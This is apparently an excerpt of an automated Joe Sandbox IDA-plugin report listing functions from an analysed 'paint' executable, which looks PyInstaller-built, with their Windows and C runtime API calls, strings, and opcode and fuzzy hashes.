Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 58477a0e701500fbf40e235bc99630d023dc2420efa3178a9134585124fcbe38
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: 2D21A176A19782A2E720DB50B8417E6A3A4EF89384F800131EE9E93799EF3DD5458700

Function 00007FF6F0BE9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6F0BE9B1D
GetProcAddress.KERNEL32 ref: 00007FF6F0BE9B33
FreeLibrary.KERNEL32 ref: 00007FF6F0BE9B5A

Strings

CorExitProcess, xrefs: 00007FF6F0BE9B2C
mscoree.dll, xrefs: 00007FF6F0BE9B14

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 1232f706875bfb8d41ec79013348bb84748a80c6e052c3eb01c13e84141742bb
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 23F04F65A19606A1EB108B64A455B7A5324AF46762F940235DA7FC73E4EF2ED048C300

Function 00007FF6F0BF93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6F0BF9400
_set_statfp.LIBCMT ref: 00007FF6F0BF941B
_set_statfp.LIBCMT ref: 00007FF6F0BF9437
_set_statfp.LIBCMT ref: 00007FF6F0BF9473

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 5f7e2e24d6ede3e7840de582d882e6ba251ff8385d6931e8aab55e526dbae262
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 0211BF7AE0CA1321F77411A8E456375204C6F7B362F840634EE7FC77DEAE2EA8424100

Function 00007FF6F0BEB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB41F
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB43E
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB466
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB477
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB488

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
Instruction ID: 5098c67132a8d9191e1c72c378cffcd9c9f5a47eebdc4a4831a1dcb0feceec16
Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
Instruction Fuzzy Hash: 0F114F60B0C643A2FB589725555157A61665F867B0F848374E93FC67D7FE3EB4018301

Function 00007FF6F0BEB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6F0BEB2A5
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB2C4
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB2EC
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB2FD
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB30E

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
Instruction ID: d1fdb636a646d318e2a35fc9ebbffe2a19788d3f82a7c43097d109001c88b5c2
Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
Instruction Fuzzy Hash: A6111560E0C207A2FFA86621445267E22924F47331F9897B4D93FCA3C3FD3EB4018241

Function 00007FF6F0BE6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE6176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE622C

Strings

verbose, xrefs: 00007FF6F0BE6020

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: c55df2e6c0694ca746d1b9d050d2184e989314500516ef87d857b70608070f5a
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 6291CE32A08A46A1F7668E24D45037D33A1AB42BD4FC44276DA6F873D6FF3EE8058301

Function 00007FF6F0BEFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEFF17

Part of subcall function 00007FF6F0BE7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE7AC9

Strings

UTF-8, xrefs: 00007FF6F0BEFE96
UTF-16LEUNICODE, xrefs: 00007FF6F0BEFEB5
ccs, xrefs: 00007FF6F0BEFE52

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 56de44e8f1467f795415ae8338c1b721cc165b2d436b73675951195d09786025
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 73818F72F08243A5FB644E2585102782AA0EB13B49FE580B5DA2BD73D6FF2FB9019341

Function 00007FF6F0BDD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6F0BDD6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6F0BDD77A
RtlUnwindEx.KERNEL32 ref: 00007FF6F0BDD7D4

Strings

csm, xrefs: 00007FF6F0BDD761

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 9ac106860b6b787191b920a5d593524cb2c303b69bb5fbe3892b9a9ea95b391a
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 7D51A432B1A642AADB158B15D444638B7A2EB45B98F904134DAAF877C4FF3EE841C700

Function 00007FF6F0BDF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6F0BDF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6F0BDF408

Strings

csm, xrefs: 00007FF6F0BDF342
csm, xrefs: 00007FF6F0BDF45A

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: f59d71ac9fe0191e497b64ae552422e79337b99eb5124e347d249ac0d90cd728
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: E351E532A0D38396EB708F219044369B7A2FB56B9AF944135DA6E877C5EF3DE450CB00

Function 00007FF6F0BDEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6F0BDEFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6F0BDEFF3

Strings

MOC, xrefs: 00007FF6F0BDEFBB
RCC, xrefs: 00007FF6F0BDEFC3

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 9394beb1f63151598161e6eac3594eec2bd9f431080c80af28607362a8daae02
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 9261B232A0DBC1D1DB609B15E4403AAB7A1FB86784F444235EBAD57B95EF7DD180CB00

Function 00007FF6F0BD7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6F0BD352C,?,00000000,00007FF6F0BD3F23), ref: 00007FF6F0BD7F22

Strings

%s%c, xrefs: 00007FF6F0BD7E94
%.*s, xrefs: 00007FF6F0BD7EDB
\, xrefs: 00007FF6F0BD7E87

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction ID: 1adcb07dcad7d3e3814122e2ec0d445c8667ee6a73cf12a533492772514a52df
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: 3631C92161AAC265EB318710A4507EAA355EF85BE4F840231EA7E877C9FE3DD5018700

Function 00007FF6F0BD2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6F0BD28EA

Strings

ERROR, xrefs: 00007FF6F0BD286F
[PYI-%d:%ls] , xrefs: 00007FF6F0BD2868
Error, xrefs: 00007FF6F0BD28DD

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: c399f70295f292b7a3f56ff47f6c04ec31914b0aee136e82ca984e476719bc4e
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 9921E272B09B81A2E7109B54F4447EA73A5FB89784F800132EE8E93796EF3DD245C700

Function 00007FF6F0BEC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6F0BEC68F
WriteFile.KERNEL32 ref: 00007FF6F0BEC957
WriteFile.KERNEL32 ref: 00007FF6F0BEC99D
GetLastError.KERNEL32 ref: 00007FF6F0BECA53

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 0cbb36abafdf50650cd2a646155c75b64e2594921c9e3c62a75212670793cb35
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 61D13172B18A859AE710CF64D4442AC37B1FB46798B809276DE6ED7BC9EE39D407C700

Function 00007FF6F0BEF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6F0BEFAEC
_get_daylight.LIBCMT ref: 00007FF6F0BEFAFD
_get_daylight.LIBCMT ref: 00007FF6F0BEFB0E
_isindst.LIBCMT ref: 00007FF6F0BEFBD9

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 4f3525148bb14eb7aed24629eabfcecfb341625919f94f8df42d5689f98b04ac
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: D4512672F08116AAEB14CF74D9516BC27A6AB0135AF914175DE2FD2BE5EF39E401C700

Function 00007FF6F0BE57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6F0BE581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF6F0BE5881
GetLastError.KERNEL32 ref: 00007FF6F0BE5912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BE5724), ref: 00007FF6F0BE595E

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: 7af00b50604d72ab9806f2ae3be5013dec9a51a9a07b75e2a7c470dc233a74e0
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: E951AC26E086419AFB10DFB1D4603BD23A1AB4AB98F948535DE2E977C9EF39D4418700

Function 00007FF6F0BD20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6F0BD20F4
SetWindowLongPtrW.USER32 ref: 00007FF6F0BD2116
GetWindowLongPtrW.USER32 ref: 00007FF6F0BD2140
InvalidateRect.USER32 ref: 00007FF6F0BD2160

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: fec8874e5c695777c2cc03d451db32959966f9dd72c11fc4c890c18a75053bb9
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: B611E921A1D582A2F75487A9E6446799253EF96780FC88030DB6B47BCAED3ED4958200

Function 00007FF6F0BF5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BF17D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF1803

_get_daylight.LIBCMT ref: 00007FF6F0BF5CA4
_get_daylight.LIBCMT ref: 00007FF6F0BF5CB5

Strings

?, xrefs: 00007FF6F0BF5C35

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: 50afb2f535af5cd588d30a6cce8bf657457c97fc794cc3acbba9ef9be5b012a1
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: 92412726A0C38262FF209B6594013795698EB82BA5F904235EF7F87BD5FF3ED4418700

